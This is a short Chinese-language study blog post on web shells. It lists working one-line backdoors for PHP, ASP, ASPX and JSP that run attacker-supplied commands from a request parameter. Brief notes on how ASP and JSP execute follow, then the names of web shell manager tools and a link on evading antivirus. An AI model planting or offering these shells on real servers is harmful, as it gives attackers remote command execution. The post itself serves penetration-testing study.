web shell总结

Posted on 2024-05-12

PREFACE：学学渗透，补补基础

# 一、句话木马：

# 1 php：

<?php @eval($_POST[‘cmd’]); ?>

比较经典我也认识，后续可能看到一些变种填这里

# 2 ASP：

<%eval request(“cmd”)%>

动态服务器网页（英文：Active Server Pages，简称 ASP），是由微软公司开发的服务器端运行的脚本平台，它被 Windows 下 Internet Information Services (IIS) 的程序所管理。透过 ActiveX server 的技术让不同的用户能有不同的画面，或需要让他们可以访问服务器（server）上的资料时，使用 ASP3.0 中提供了五个内置的对象建立模拟和安全性的动态内容，来协助程序员隐藏复杂的沟通机制，让程序员可以专注在解决问题和应用之上，这样可以更快速地开发动态网页的同时每一个组件都是可以由一组富有经验的程序员根据动态网页最常用的功能而独立开发。

ASP 脚本原生支持通过 VBScript 和 JScript 两种脚本语言来建立动态页面，本质上是将 PC 端的脚本执行能力迁移到了服务器。使用 ASP 技术构建的网站，通常都是部署在 IIS 或 PWS 服务器上。

借用一个简图表示浏览器请求一个 ASP 脚本的流程：

Untitled

当 Web 应用服务器 (IIS) 判断出请求是访问 ASP 脚本后，自动通过 Isapi 模块调用 ASP 脚本的解释运行引擎 asp.dll。asp.dll 从文件系统或内部缓冲区中获取 ASP 脚本的文本内容，然后进行语法分析并解释执行。

# 3 ASPX：

ASP.NET，新一代 ASP，需要编译，速度比 ASP 快，其它差不太多

<%@ Page Language=”Jscript”%><%eval(Request.Item[“cmd”],”unsafe”);%>

# 4 JSP：

<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>

Java Server Pages (JSP) is a server-side programming technology that enables the creation of dynamic, platform-independent method for building Web-based applications. JSP have access to the entire family of Java APIs.

有这样的过程： .jsp -> .java -> .class

# 大马

目前准备了

# 1 冰蝎

# 2 蚁剑

# 3 哥斯拉

参考：

构造免杀的 asp 一句话木马 - 先知社区 (aliyun.com)

JSP Webshell Cookbook: Part-1. Preface | by jdlkajflkd | Medium